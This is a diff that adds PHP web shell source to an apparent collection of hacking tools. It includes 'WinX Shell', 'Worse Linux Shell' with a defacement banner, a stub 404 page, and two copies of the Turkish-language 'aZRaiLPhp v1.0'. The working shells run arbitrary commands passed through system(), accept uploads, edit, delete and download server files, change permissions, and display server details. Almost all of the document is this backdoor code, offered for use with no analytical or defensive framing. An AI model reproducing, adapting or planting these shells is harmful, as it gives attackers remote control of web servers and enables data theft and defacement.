+print((is_readable($f) && is_writeable($f))?"<tr><td>".w(1).b("R".w(1).font('red','RW',3)).w(1):(((is_readable($f))?"<tr><td>".w(1).b("R").w(4):"").((is_writable($f))?"<tr><td>".w(1).b(font('red','RW',3)):"")));
+$r=sprintf("%o",(@fileperms($f)) & 0777);
+$ow=posix_getpwuid($l[4]);
+$gr=posix_getgrgid($l[5]);
+$fow=($ow["name"]?$ow["name"]:fileowner($f))."/".($gr["name"]?$gr["name"]:filegroup($f));
+if(!is_readable($f) && !is_writeable($f)) echo "<tr><td>".w(12);
+echo "</td><td>$r</td><td>$fow</td>";
+if(!is_dir($f)){
+if(!is_link($f)){
+echo w(2)."<td><i>".$l[7]."</i></td>";}
+else echo "</td><td>link</td>";}
+else echo "</td><td>DIR</td>";
+$fi=htmlspecialchars($f);
+echo "<td>".@strftime('%B %e %H:%M',@filemtime($f))."</td><td>".(is_dir($f)?font('blue',$fi,3):$fi)."</td>\n";}
+?>
+</table></body></html>
+<?php exit; ?>

php/WinX Shell.php

@@ -0,0 +1,103 @@
+<html><head><title>-:[GreenwooD]:- WinX Shell</title></head>
+<body bgcolor="#FFFFFF" text="#000000" link="#0066FF" vlink="#0066FF" alink="#0066FF">
+<?php
+
+// -----:[ Start infomation ]:-----
+// It's simple shell for all Win OS.
+// Created by greenwood from n57
+//
+// ------:[ End infomation]:-------
+
+
+set_magic_quotes_runtime(0);
+//*Variables*
+
+//-------------------------------
+
+$veros = `ver`;
+$host = gethostbyaddr($_SERVER['REMOTE_ADDR']);
+$windir = `echo %windir%`;
+
+
+//------------------------------
+   if( $cmd == "" ) {
+    $cmd = 'dir /OG /X';
+  }
+//-------------------------------
+
+
+//------------------------------
+
+print "<table  style=\"font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 9px; border: 1px #000000 dotted\"  border=\"0\" cellspacing=\"1\" cellpadding=\"2\"  >";
+print    "<tr>";
+print      "<td><font color=\"#990000\">You:</font></td>" ;
+print      "<td> ".$_SERVER['REMOTE_ADDR']." [<font color=\"#0033CC\">".$host."</font>] </td>" ;
+print    "</tr>";
+print    "<tr>";
+print      "<td><font color=\"red\">Version OS:</font></td>" ;
+print      "<td><font color=\"#0066CC\"> $veros </font></td>";
+print    "</tr>";
+print    "<tr>";
+print     "<td><font color=\"#990000\">Server:</font></td>";
+print      "<td><font color=\"#0066CC\">".$_SERVER['SERVER_SIGNATURE']."</font></td>";
+print    "</tr>";
+print    "<tr>";
+print     "<td><font color=\"#990000\">Win Dir:</font></td>";
+print      "<td><font color=\"#0066CC\"> $windir </font></td>";
+print    "</tr>";
+print  "</table>";
+print  "<br>";
+
+//------- [netstat -an] and [ipconfig] and [tasklist] ------------
+print "<form name=\"cmd_send\" method=\"post\" action=\"$PHP_SELF\">";
+print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"netstat -an\">";
+print "&nbsp;&nbsp;&nbsp;";
+print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"ipconfig\">";
+print "&nbsp;&nbsp;&nbsp;";
+print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"tasklist\">";
+print "</form>";
+//-------------------------------
+
+
+//-------------------------------
+
+print "<textarea style=\"width:100%; height:50% ;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" readonly>";
+       system($cmd);
+print "</textarea>";
+print "<br>";
+
+//-------------------------------
+
+print "<form name=\"cmd_send\" method=\"post\" action=\"$PHP_SELF\">";
+print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">CMD: </font>";
+print "<br>";
+print "<input style=\"font-family: Verdana; font-size: 12px; width:50%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"text\" name=\"cmd\" value=\"$cmd\">";
+print " <input style = \"font-family: Verdana; font-size: 12px; background-color: #FFFFFF; border: #666666; border-style: solid; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"_run\" value=\"Run\">";
+print "</form>";
+
+//-------------------------------
+
+print "<form  enctype=\"multipart/form-data\" action=\"$PHP_SELF\" method=\"post\">";
+print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">Upload:</font>";
+print "<br>";
+print "<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000\">";
+print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">File: </font><input style=\"font-family: Verdana; font-size: 9px; background-color: #FFFFFF; border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" name=\"userfile\" type=\"file\">";
+print " <font face=\"Verdana\" size=\"1\" color=\"#990000\">Filename on server: </font> <input style=\"font-family: Verdana; font-size: 9px;background-color: #FFFFFF; border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" name=\"serverfile\" type=\"text\">";
+print" <input style =\"font-family: Verdana; font-size: 9px; background-color: #FFFFFF; border: #666666; border-style: solid; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" value=\"Send\">";
+print"</form>";
+
+?>
+
+
+<?
+
+// Script for uploading
+ if (is_uploaded_file($userfile)) {
+move_uploaded_file($userfile, $serverfile);
+}
+
+?>
+
+
+<center><font face="Verdana" size="1" color="#000000">Created by -:[GreenwooD]:- </font></center>
+</body></html>

php/Worse Linux Shell.php

@@ -0,0 +1,69 @@
+<?php
+
+set_magic_quotes_runtime(0);
+
+print "<style>body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}</style>";
+print "<center><h1>#worst @dal.net</h1></center>";
+print "<center><h1>You have been hack By Shany with Love To #worst.</h1></center>";
+print "<center><h1>Watch Your system Shany was here.</h1></center>";
+print "<center><h1>Linux Shells</h1></center>";
+print "<hr><hr>";
+
+$currentWD  = str_replace("\\\\","\\",$_POST['_cwd']);
+$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
+
+$UName  = `uname -a`;
+$SCWD   = `pwd`;
+$UserID = `id`;
+
+if( $currentWD == "" ) {
+    $currentWD = $SCWD;
+}
+
+print "<table>";
+print "<tr><td><b>We are:</b></td><td>".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")</td></tr>";
+print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td></tr>";
+print "<tr><td><b>System type:</b></td><td>$UName</td></tr>";
+print "<tr><td><b>Our permissions:</b></td><td>$UserID</td></tr>";
+print "</table>";
+
+print "<hr><hr>";
+
+if( $_POST['_act'] == "List files!" ) {
+    $currentCMD = "ls -la";
+}
+
+print "<form method=post enctype=\"multipart/form-data\"><table>";
+
+print "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
+print "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";
+
+print "<tr><td><b>Change directory:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
+print "<td><input type=submit name=_act value=\"List files!\"></td></tr>";
+
+print "<tr><td><b>Upload file:</b></td><td><input size=85 type=file name=_upl></td>";
+print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
+
+print "</table></form><hr><hr>";
+
+$currentCMD = str_replace("\\\"","\"",$currentCMD);
+$currentCMD = str_replace("\\\'","\'",$currentCMD);
+
+if( $_POST['_act'] == "Upload!" ) {
+    if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
+        print "<center><b>Error while uploading file!</b></center>";
+    } else {
+        print "<center><pre>";
+        system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
+        print "</pre><b>File uploaded successfully!</b></center>";
+    }    
+} else {
+    print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
+    $currentCMD = "cd ".$currentWD.";".$currentCMD;
+    system($currentCMD);
+    print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>Command completed</b></center>";
+}
+
+exit;
+
+?>

php/ZyklonShell.php

@@ -0,0 +1,7 @@
+<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
+<HTML><HEAD>
+<TITLE>404 Not Found</TITLE>
+</HEAD><BODY>
+<H1>Not Found</H1>
+The requested URL /Nemo/shell/zyklonshell.txt was not found on this server.<P>
+</BODY></HTML>

php/aZRaiLPhp v1.0.php

@@ -0,0 +1,284 @@
+<?php
+$default=$DOCUMENT_ROOT;
+$this_file="./azrailphp.php";
+
+if(isset($save)){
+$fname=str_replace(" ","_",$fname);
+$fname=str_replace("%20","_",$fname);
+header("Cache-control: private");
+header("Content-type: application/force-download");
+header("Content-Length: ".filesize($save));
+header("Content-Disposition: attachment; filename=$fname");
+
+$fp = fopen($save, 'r');
+fpassthru($fp);
+fclose($fp);
+unset($save);
+exit;
+}
+
+if ( function_exists('ini_get') ) {
+        $onoff = ini_get('register_globals');
+} else {
+        $onoff = get_cfg_var('register_globals');
+}
+if ($onoff != 1) {
+        @extract($_POST, EXTR_SKIP);
+        @extract($_GET, EXTR_SKIP);
+}
+
+
+function deltree($deldir) {
+        $mydir=@dir($deldir);
+        while($file=$mydir->read())        {
+                if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
+                        @chmod("$deldir/$file",0777);
+                        deltree("$deldir/$file");
+                }
+                if (is_file("$deldir/$file")) {
+                        @chmod("$deldir/$file",0777);
+                        @unlink("$deldir/$file");
+                }
+        }
+        $mydir->close();
+        @chmod("$deldir",0777);
+        echo @rmdir($deldir) ? "<center><b><font color='#0000FF'>SÝLÝNDÝ:$deldir/$file</b></font></center>" : "<center><font color=\"#ff0000\">Silinemedi:$deldir/$file</font></center>";
+        }
+
+if ($op=='phpinfo'){
+$fonk_kap = get_cfg_var("fonksiyonlarý_kapat");
+        echo $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : "<center>phpinfo() Komutu Çalýþmýyiii</center>";
+        exit;
+}
+
+
+echo "<html>
+      <head>
+             <title>azrail 1.0 by C-W-M</title>
+      </head>
+
+       <body bgcolor='#000000' text='#008000' link='#00FF00' vlink='#00FF00' alink='#00FF00'>
+       </body>";
+
+echo "<center><font size='+3' color='#FF0000'><b> aZRaiLPhp v1.0!!!</b></font></center><br>
+      <center><font size='+2' color='#FFFFFF'>C-W-M</font><font size='+2' color='#FF0000'>HACKER</font><br>
+      <br>";
+echo "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP INFO</a></center>";
+echo "<br>
+      <br>";
+
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<div align=center>
+      <font size='+1' color='#0000FF'>Root Klasör: $DOCUMENT_ROOT</font><br>
+      <font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>";
+
+if(!isset($dir)){
+$dir="$default";
+}
+echo "<input type=text size=60 name=dir value='$dir'>
+<input type=submit value='GIT'><br>
+</form>
+</div>";
+
+if ($op=='up'){
+        $path=dir;
+        echo "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA GONDERME</b></font></center><br>";
+if(isset($dosya_gonder)) {
+
+if (copy ( $dosya_gonder, "$dir/$dosya_gonder_name" )){
+    echo "<center><font color='#0000FF'>Dosya Baþarýyla Gönderildi</font></center>";
+}
+} elseif(empty($dosya_gonder)) {
+$path=$dir;
+$dir = $dosya_dizin;
+echo "$dir";
+echo "<FORM  ENCTYPE='multipart/form-data' ACTION='$this_file?op=up&dir=$path' METHOD='POST'>";
+echo "<center><INPUT TYPE='file' NAME='dosya_gonder'></center><br>";
+
+echo "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>";
+echo "</form>";
+
+
+echo "</html>";
+} else {
+die ("<center><font color='#FF0000'>Dosya kopyalanamýyor!</font><center>");
+}
+}
+
+if($op=='mf'){
+    $path=$dir;
+    if(isset($dismi) && isset($kodlar)){
+                $ydosya="$path/$dismi";
+                if(file_exists("$path/$dismi")){
+                        $dos= "Böyle Bir Dosya Vardý Üzerine Yazýldý";
+                } else {
+                        $dos = "Dosya Oluþturuldu";
+                }
+                touch ("$path/$dismi") or die("Dosya Oluþturulamýyor");
+                $ydosya2 = fopen("$ydosya", 'w') or die("Dosya yazmak için açýlamýyor");
+                fwrite($ydosya2, $kodlar) or die("Dosyaya yazýlamýyor");
+                fclose($ydosya2);
+                echo "<center><font color='#0000FF'>$dos</font></center>";
+        } else {
+
+        echo "<FORM METHOD='POST' ACTION='$this_file?op=mf&dir=$path'>";
+        echo "<center>Dosya Ýsmi :<input type='text' name='dismi'></center><br>";
+    echo "<br>";
+    echo "<center>KODLAR</center><br>";
+    echo "<center><TEXTAREA NAME='kodlar' ROWS='19' COLS='52'></TEXTAREA></center>";
+        echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
+    echo "</form>";
+        }
+}
+
+if($op=='md'){
+        $path=$dir;
+        if(isset($kismi) && isset($okmf)){
+                $klasör="$path/$kismi";
+                mkdir("$klasör", 0777) or die ("<center><font color='#0000FF'>Klasör Oluþturulamýyor</font></center>");
+                echo "<center><font color='#0000FF'>Klasör Oluþturuldu</font></center>";
+        }
+
+        echo "<FORM METHOD='POST' ACTION='$this_file?op=md&dir=$path'>";
+        echo "<center>Klasör Ýsmi :<input type='text' name='kismi'></center><br>";
+        echo "<br>";
+        echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
+        echo "</form>";
+}
+
+
+if($op=='del'){
+unlink("$fname");
+}
+
+
+if($op=='dd'){
+        $dir=$here;
+                $deldirs=$yol;
+                if(!file_exists("$deldirs")) {
+                        echo "<font color=\"#ff0000\">Dosya Yok</font>";
+                } else {
+                        deltree($deldirs);
+                }
+}
+
+
+
+if($op=='edit'){
+$yol=$fname;
+$yold=$path;
+if (isset($ok)){
+$dosya = fopen("$yol", 'w') or die("Dosya Açýlamýyor");
+$metin=$tarea;
+fwrite($dosya, $metin) or die("Yazýlamýyor!");
+fclose($dosya);
+echo "<center><font color='#0000FF'Dosya Baþarýyla Düzenlendi</font></center>";
+} else {
+$path=$dir;
+echo "<center>DÜZENLE: $yol</center>";
+$dosya = fopen("$yol", 'r') or die("<center><font color='#FF0000'Dosya Açýlamýyor</font></center>");
+$boyut=filesize($yol);
+$duzen = @fread ($dosya, $boyut);
+echo "<form method=post action=$this_file?op=edit&fname=$yol&dir=$path>";
+echo "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea rows=19 cols=52>$duzen</TEXTAREA></center><br>";
+echo "<center><input type='Submit' value='TAMAM' name='ok'></center>";
+fclose($dosya);
+$duzen=htmlspecialchars($duzen);
+echo "</form>";
+}
+}
+
+if($op=='efp2'){
+$fileperm=base_convert($_POST['fileperm'],8,10);
+        echo $msg=@chmod($dir."/".$dismi2,$fileperm) ? "<font color='#0000FF'><b>$dismi2 ÝSÝMLÝ DOSYANIN</font></b>" : "<font color=\"#ff0000\">DEÝÞTÝRÝLEMEDÝ!!</font>";
+        echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DEÝÞTÝRÝLDÝ</font>";
+}
+
+if($op=='efp'){
+$izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
+echo "<form method=post action=./$this_file?op=efp2>
+      <div align=center><input name='dismi2' type='text' value='$dismi' class='input' readonly>CHMOD:
+      <input type='text' name='fileperm' size='20' value='$izinler2' class='input'>
+      <input name='dir' type='hidden' value='$yol'>
+      <input type='submit' value='TAMAM' class='input'></div><br>
+      </form>";
+
+}
+
+
+$path=$dir;
+if(isset($dir)){
+if ($dir = @opendir("$dir")) {
+while (($file = readdir($dir)) !== false) {
+if($file!="." && $file!=".."){
+if(is_file("$path/$file")){
+$disk_space=filesize("$path/$file");
+$kb=$disk_space/1024;
+$total_kb = number_format($kb, 2, '.', '');
+$total_kb2="Kb";
+
+
+echo "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> $file</b></font> - <a href='./$this_file?save=$path/$file&fname=$file'>indir</a> - <a href='./$this_file?op=edit&fname=$path/$file&dir=$path'>düzenle</a> - ";
+echo "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> - <b>$total_kb$total_kb2</b> - ";
+@$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
+echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
+echo "<br></div>\n";
+}else{
+echo "<div align=left><a href='./$this_file?dir=$path/$file'>GÝT></a> <font face='arial' size='3' color='#808080'> $path/$file</font> - <b>DIR</b> - <a href='./$this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> - ";
+$dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
+echo "<font color='#FFFF00'>$dirperm</font>";
+echo " <br></div>\n";
+
+}
+}
+}
+closedir($dir);
+}
+}
+
+
+
+
+
+echo "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root Klasörüne Git</a></center>";
+if(file_exists("B:\\")){
+echo "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
+} else {}
+if(file_exists("C:\\")){
+echo "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
+} else {}
+if (file_exists("D:\\")){
+ echo "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
+} else {}
+if (file_exists("E:\\")){
+ echo "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
+} else {}
+if (file_exists("F:\\")){
+ echo "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
+} else {}
+if (file_exists("G:\\")){
+ echo "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
+} else {}
+if (file_exists("H:\\")){
+ echo "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
+} else {}
+
+
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center><font size='+1' color='#FF0000'><b>SERVER BÝLGÝLERÝ</b></font><br></center>";
+echo "<br><u><b>$SERVER_SIGNATURE</b></u>";
+echo "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
+echo "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
+echo "<br>";
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center><font size='+1' color='#FF0000'><b>ÝÞLEMLER</b></font><br></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=up&dir=$path'>Dosya Gönder</a></font></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=mf&dir=$path'>Dosya Oluþtur</a></font></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=md&dir=$path'>Klasör Oluþtur</a></font></center>";
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center>Tüm haklarý sahibi 	C-W-M'ye aittir</center><br>";
+?>
+
+
+
+

php/aZRaiLPhp_v1.0.php

@@ -0,0 +1,284 @@
+<?php
+$default=$DOCUMENT_ROOT;
+$this_file="./azrailphp.php";
+
+if(isset($save)){
+$fname=str_replace(" ","_",$fname);
+$fname=str_replace("%20","_",$fname);
+header("Cache-control: private");
+header("Content-type: application/force-download");
+header("Content-Length: ".filesize($save));
+header("Content-Disposition: attachment; filename=$fname");
+
+$fp = fopen($save, 'r');
+fpassthru($fp);
+fclose($fp);
+unset($save);
+exit;
+}
+
+if ( function_exists('ini_get') ) {
+        $onoff = ini_get('register_globals');
+} else {
+        $onoff = get_cfg_var('register_globals');
+}
+if ($onoff != 1) {
+        @extract($_POST, EXTR_SKIP);
+        @extract($_GET, EXTR_SKIP);
+}
+
+
+function deltree($deldir) {
+        $mydir=@dir($deldir);
+        while($file=$mydir->read())        {
+                if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
+                        @chmod("$deldir/$file",0777);
+                        deltree("$deldir/$file");
+                }
+                if (is_file("$deldir/$file")) {
+                        @chmod("$deldir/$file",0777);
+                        @unlink("$deldir/$file");
+                }
+        }
+        $mydir->close();
+        @chmod("$deldir",0777);
+        echo @rmdir($deldir) ? "<center><b><font color='#0000FF'>SÝLÝNDÝ:$deldir/$file</b></font></center>" : "<center><font color=\"#ff0000\">Silinemedi:$deldir/$file</font></center>";
+        }
+
+if ($op=='phpinfo'){
+$fonk_kap = get_cfg_var("fonksiyonlarý_kapat");
+        echo $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : "<center>phpinfo() Komutu Çalýþmýyiii</center>";
+        exit;
+}
+
+
+echo "<html>
+      <head>
+             <title>azrail 1.0 by C-W-M</title>
+      </head>
+
+       <body bgcolor='#000000' text='#008000' link='#00FF00' vlink='#00FF00' alink='#00FF00'>
+       </body>";
+
+echo "<center><font size='+3' color='#FF0000'><b> aZRaiLPhp v1.0!!!</b></font></center><br>
+      <center><font size='+2' color='#FFFFFF'>C-W-M</font><font size='+2' color='#FF0000'>HACKER</font><br>
+      <br>";
+echo "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP INFO</a></center>";
+echo "<br>
+      <br>";
+
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<div align=center>
+      <font size='+1' color='#0000FF'>Root Klasör: $DOCUMENT_ROOT</font><br>
+      <font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>";
+
+if(!isset($dir)){
+$dir="$default";
+}
+echo "<input type=text size=60 name=dir value='$dir'>
+<input type=submit value='GIT'><br>
+</form>
+</div>";
+
+if ($op=='up'){
+        $path=dir;
+        echo "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA GONDERME</b></font></center><br>";
+if(isset($dosya_gonder)) {
+
+if (copy ( $dosya_gonder, "$dir/$dosya_gonder_name" )){
+    echo "<center><font color='#0000FF'>Dosya Baþarýyla Gönderildi</font></center>";
+}
+} elseif(empty($dosya_gonder)) {
+$path=$dir;
+$dir = $dosya_dizin;
+echo "$dir";
+echo "<FORM  ENCTYPE='multipart/form-data' ACTION='$this_file?op=up&dir=$path' METHOD='POST'>";
+echo "<center><INPUT TYPE='file' NAME='dosya_gonder'></center><br>";
+
+echo "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>";
+echo "</form>";
+
+
+echo "</html>";
+} else {
+die ("<center><font color='#FF0000'>Dosya kopyalanamýyor!</font><center>");
+}
+}
+
+if($op=='mf'){
+    $path=$dir;
+    if(isset($dismi) && isset($kodlar)){
+                $ydosya="$path/$dismi";
+                if(file_exists("$path/$dismi")){
+                        $dos= "Böyle Bir Dosya Vardý Üzerine Yazýldý";
+                } else {
+                        $dos = "Dosya Oluþturuldu";
+                }
+                touch ("$path/$dismi") or die("Dosya Oluþturulamýyor");
+                $ydosya2 = fopen("$ydosya", 'w') or die("Dosya yazmak için açýlamýyor");
+                fwrite($ydosya2, $kodlar) or die("Dosyaya yazýlamýyor");
+                fclose($ydosya2);
+                echo "<center><font color='#0000FF'>$dos</font></center>";
+        } else {
+
+        echo "<FORM METHOD='POST' ACTION='$this_file?op=mf&dir=$path'>";
+        echo "<center>Dosya Ýsmi :<input type='text' name='dismi'></center><br>";
+    echo "<br>";
+    echo "<center>KODLAR</center><br>";
+    echo "<center><TEXTAREA NAME='kodlar' ROWS='19' COLS='52'></TEXTAREA></center>";
+        echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
+    echo "</form>";
+        }
+}
+
+if($op=='md'){
+        $path=$dir;
+        if(isset($kismi) && isset($okmf)){
+                $klasör="$path/$kismi";
+                mkdir("$klasör", 0777) or die ("<center><font color='#0000FF'>Klasör Oluþturulamýyor</font></center>");
+                echo "<center><font color='#0000FF'>Klasör Oluþturuldu</font></center>";
+        }
+
+        echo "<FORM METHOD='POST' ACTION='$this_file?op=md&dir=$path'>";
+        echo "<center>Klasör Ýsmi :<input type='text' name='kismi'></center><br>";
+        echo "<br>";
+        echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
+        echo "</form>";
+}
+
+
+if($op=='del'){
+unlink("$fname");
+}
+
+
+if($op=='dd'){
+        $dir=$here;
+                $deldirs=$yol;
+                if(!file_exists("$deldirs")) {
+                        echo "<font color=\"#ff0000\">Dosya Yok</font>";
+                } else {
+                        deltree($deldirs);
+                }
+}
+
+
+
+if($op=='edit'){
+$yol=$fname;
+$yold=$path;
+if (isset($ok)){
+$dosya = fopen("$yol", 'w') or die("Dosya Açýlamýyor");
+$metin=$tarea;
+fwrite($dosya, $metin) or die("Yazýlamýyor!");
+fclose($dosya);
+echo "<center><font color='#0000FF'Dosya Baþarýyla Düzenlendi</font></center>";
+} else {
+$path=$dir;
+echo "<center>DÜZENLE: $yol</center>";
+$dosya = fopen("$yol", 'r') or die("<center><font color='#FF0000'Dosya Açýlamýyor</font></center>");
+$boyut=filesize($yol);
+$duzen = @fread ($dosya, $boyut);
+echo "<form method=post action=$this_file?op=edit&fname=$yol&dir=$path>";
+echo "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea rows=19 cols=52>$duzen</TEXTAREA></center><br>";
+echo "<center><input type='Submit' value='TAMAM' name='ok'></center>";
+fclose($dosya);
+$duzen=htmlspecialchars($duzen);
+echo "</form>";
+}
+}
+
+if($op=='efp2'){
+$fileperm=base_convert($_POST['fileperm'],8,10);
+        echo $msg=@chmod($dir."/".$dismi2,$fileperm) ? "<font color='#0000FF'><b>$dismi2 ÝSÝMLÝ DOSYANIN</font></b>" : "<font color=\"#ff0000\">DEÝÞTÝRÝLEMEDÝ!!</font>";
+        echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DEÝÞTÝRÝLDÝ</font>";
+}
+
+if($op=='efp'){
+$izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
+echo "<form method=post action=./$this_file?op=efp2>
+      <div align=center><input name='dismi2' type='text' value='$dismi' class='input' readonly>CHMOD:
+      <input type='text' name='fileperm' size='20' value='$izinler2' class='input'>
+      <input name='dir' type='hidden' value='$yol'>
+      <input type='submit' value='TAMAM' class='input'></div><br>
+      </form>";
+
+}
+
+
+$path=$dir;
+if(isset($dir)){
+if ($dir = @opendir("$dir")) {
+while (($file = readdir($dir)) !== false) {
+if($file!="." && $file!=".."){
+if(is_file("$path/$file")){
+$disk_space=filesize("$path/$file");
+$kb=$disk_space/1024;
+$total_kb = number_format($kb, 2, '.', '');
+$total_kb2="Kb";
+
+
+echo "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> $file</b></font> - <a href='./$this_file?save=$path/$file&fname=$file'>indir</a> - <a href='./$this_file?op=edit&fname=$path/$file&dir=$path'>düzenle</a> - ";
+echo "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> - <b>$total_kb$total_kb2</b> - ";
+@$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
+echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
+echo "<br></div>\n";
+}else{
+echo "<div align=left><a href='./$this_file?dir=$path/$file'>GÝT></a> <font face='arial' size='3' color='#808080'> $path/$file</font> - <b>DIR</b> - <a href='./$this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> - ";
+$dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
+echo "<font color='#FFFF00'>$dirperm</font>";
+echo " <br></div>\n";
+
+}
+}
+}
+closedir($dir);
+}
+}
+
+
+
+
+
+echo "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root Klasörüne Git</a></center>";
+if(file_exists("B:\\")){
+echo "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
+} else {}
+if(file_exists("C:\\")){
+echo "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
+} else {}
+if (file_exists("D:\\")){
+ echo "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
+} else {}
+if (file_exists("E:\\")){
+ echo "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
+} else {}
+if (file_exists("F:\\")){
+ echo "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
+} else {}
+if (file_exists("G:\\")){
+ echo "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
+} else {}
+if (file_exists("H:\\")){
+ echo "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
+} else {}
+
+
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center><font size='+1' color='#FF0000'><b>SERVER BÝLGÝLERÝ</b></font><br></center>";
+echo "<br><u><b>$SERVER_SIGNATURE</b></u>";
+echo "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
+echo "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
+echo "<br>";
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center><font size='+1' color='#FF0000'><b>ÝÞLEMLER</b></font><br></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=up&dir=$path'>Dosya Gönder</a></font></center>";
